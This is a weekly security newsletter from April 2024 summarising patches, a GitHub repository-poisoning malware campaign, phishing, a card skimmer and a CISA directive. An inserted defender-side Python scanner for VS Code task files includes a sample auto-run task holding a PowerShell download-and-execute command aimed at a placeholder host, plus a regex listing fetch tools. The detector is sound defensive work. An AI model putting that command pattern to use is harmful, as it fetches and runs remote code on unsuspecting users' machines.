Weekly Security News – 15th April 2024

Welcome to this week’s Security News. We’ve collated the best articles from around the internet and put them all into one place. If you have any queries or concerns about anything in this week’s news, then please get in touch with our team, who can advise further. For our existing clients, if we believe anything may affect your organisation, our team will be in touch directly.

Vulnerabilities and Patches

Microsoft Releases April 2024 Security Updates

Microsoft has released security updates to address 149 vulnerabilities, including two (CVE-2024-26234 and CVE-2024-29988) that are actively exploited and four rated as critical (CVE-2024-21322, CVE-2024-21323, CVE-2024-29053 and CVE-2024-29990). The platforms known to be affected are Microsoft Windows, Microsoft Defender SmartScreen, Microsoft Azure Kubernetes Service and Microsoft Defender for IoT. Affected organisations are encouraged to review Microsoft’s April 2024 Security Update Summary and apply the relevant updates.

Fortinet Releases Multiple Security Advisories

Fortinet has released security advisories to address multiple vulnerabilities (CVE-2023-45590, CVE-2023-41677, CVE-2023-45588 and CVE-2024-31492). The security advisories address one critical vulnerability in FortiClientLinux, one high-severity vulnerability in FortiClientMac, and one high-severity vulnerability in the SSL-VPN component of FortiOS and FortiProxy. FortiClient, FortiOS and FortiProxy all provide a virtual private network solution. The platforms known to be affected are Fortinet FortiOS, Fortinet FortiProxy and Fortinet FortiClient. Affected organisations are encouraged to review the relevant Fortinet Security Advisories and apply the relevant updates.

Cyber Attacks

GitHub’s Fake Popularity Scam Tricking Developers into Downloading Malware

Threat actors are now taking advantage of GitHub’s search functionality to trick unsuspecting users looking for popular repositories into downloading spurious counterparts that serve malware. The latest assault on the open-source software supply chain involves concealing malicious code within Microsoft Visual Studio Code project files that is designed to download next-stage payloads from a remote URL, Checkmarx said in a report shared with The Hacker News. The idea is to manipulate the search rankings in GitHub so that threat actor-controlled repositories rise to the top when users filter and sort their results by the most recent updates, and to inflate those repositories’ apparent popularity with bogus stars added from fake accounts.
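As an added, defender-side example (not code from the Checkmarx report or from the original article): a Python check that scans a checked-out repository's VS Code task definitions for tasks that fetch content from a remote URL, and flags whether they are configured to run automatically when the folder is opened. It assumes VS Code's `.vscode/tasks.json` with `runOptions.runOn: "folderOpen"` as the auto-run mechanism; the sample task file and its URL are constructed.

```python
import json
import re
from pathlib import Path

# Constructed sample .vscode/tasks.json (not from any real repository):
# the first task auto-runs when the folder is opened and pulls a second
# stage from a remote URL; the second is an ordinary build task.
SAMPLE_TASKS_JSON = """{
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell",
     "command": "powershell -c \\"iwr http://payload.invalid/s2.ps1 | iex\\"",
     "runOptions": {"runOn": "folderOpen"}},
    {"label": "test", "type": "shell", "command": "npm test"}
  ]
}"""

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Common download/execute helpers on Windows and Unix shells.
FETCH_RE = re.compile(
    r"\b(curl|wget|iwr|Invoke-WebRequest|iex|Invoke-Expression|certutil|bitsadmin)\b",
    re.IGNORECASE)

def command_text(task: dict) -> str:
    """Flatten a task's command and args into one string for matching."""
    parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
    return " ".join(parts)

def suspicious_tasks(tasks_json: str) -> list:
    """Return (label, trigger) for tasks whose command fetches from a remote URL.

    trigger is "auto-run" when runOptions.runOn == "folderOpen" (the task
    fires as soon as a trusted folder is opened), otherwise "manual".
    """
    doc = json.loads(tasks_json)  # real tasks.json may be JSONC; strip comments first
    findings = []
    for task in doc.get("tasks", []):
        text = command_text(task)
        if URL_RE.search(text) and FETCH_RE.search(text):
            auto = task.get("runOptions", {}).get("runOn") == "folderOpen"
            findings.append((task.get("label", "<unnamed>"), "auto-run" if auto else "manual"))
    return findings

def scan_repo(root: str) -> dict:
    """Scan every .vscode/tasks.json under a checked-out repository."""
    return {str(p): suspicious_tasks(p.read_text(encoding="utf-8"))
            for p in Path(root).rglob("tasks.json") if p.parent.name == ".vscode"}

if __name__ == "__main__":
    print(suspicious_tasks(SAMPLE_TASKS_JSON))  # [('build', 'auto-run')]
```

Run `scan_repo` over a freshly cloned repository before opening it in the editor; an "auto-run" finding is the pattern worth treating as a supply-chain red flag rather than a build convenience.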

Cybercriminals Targeting Latin America with Sophisticated Phishing Scheme

A new phishing campaign has set its sights on the Latin American region to deliver malicious payloads to Windows systems. “The phishing email contained a ZIP file attachment that when extracted reveals an HTML file that leads to a malicious file download posing as an invoice,” Trustwave SpiderLabs researcher Karla Agregado said. The HTML file contains a link (“facturasmex[.]cloud”) that displays an error message saying, “this account has been suspended,” but when visited from an IP address geolocated to Mexico, loads a CAPTCHA verification page that uses Cloudflare Turnstile.

Articles

Sneaky Credit Card Skimmer Disguised as Harmless Facebook Tracker

Cybersecurity researchers have discovered a credit card skimmer that is concealed within a fake Meta Pixel tracker script in an attempt to evade detection. Sucuri said that the malware is injected into websites through tools that allow for custom code, such as WordPress plugins like Simple Custom CSS and JS or the “Miscellaneous Scripts” section of the Magento admin panel. To mitigate such risks, it is recommended to keep sites up to date, periodically review admin accounts to determine whether all of them are valid, and update passwords on a frequent basis.

U.S. Federal Agencies Ordered to Hunt for Signs of Microsoft Breach and Mitigate Risks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday issued an emergency directive (ED 24-02) urging federal agencies to hunt for signs of compromise and enact preventive measures following the recent compromise of Microsoft’s systems that led to the theft of email correspondence with the company. The attack, which came to light earlier this year, has been attributed to a Russian nation-state group tracked as Midnight Blizzard (aka APT29 or Cozy Bear). Last month, Microsoft revealed that the adversary managed to access some of its source code repositories but noted that there is no evidence of a breach of customer-facing systems.